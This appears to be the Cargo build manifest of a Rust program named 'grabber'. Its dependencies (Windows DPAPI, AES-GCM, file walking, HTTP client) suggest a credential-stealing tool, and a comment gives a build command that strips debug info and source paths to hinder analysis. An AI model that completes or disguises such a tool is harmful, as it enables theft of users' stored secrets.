[package]
name = "grabber"
version = "0.1.0"
edition = "2021"

[dependencies]
aes-gcm = "0.10.2"
regex = "1.9.3"
base64 = "0.21.2"
winapi = { version = "0.3.9", features = ["dpapi"] }
serde_json = "1.0"
lazy_static = "1.4.0"
rayon = "1.7"
reqwest = {version = "0.11.20", features = ["blocking", "json"]}
tokio = {version = "1.32.0", features = ["full"]}
jwalk = "0.8.1"

[profile.release]
debug = false
strip = "symbols"
panic = "abort"

[[bin]]
name = "grabber"
path = "src/main.rs"

# Try this to remove debug info
# cargo rustc --release -- --remap-path-prefix=$CARGO_MANIFEST_DIR=/ -Cdebuginfo=0
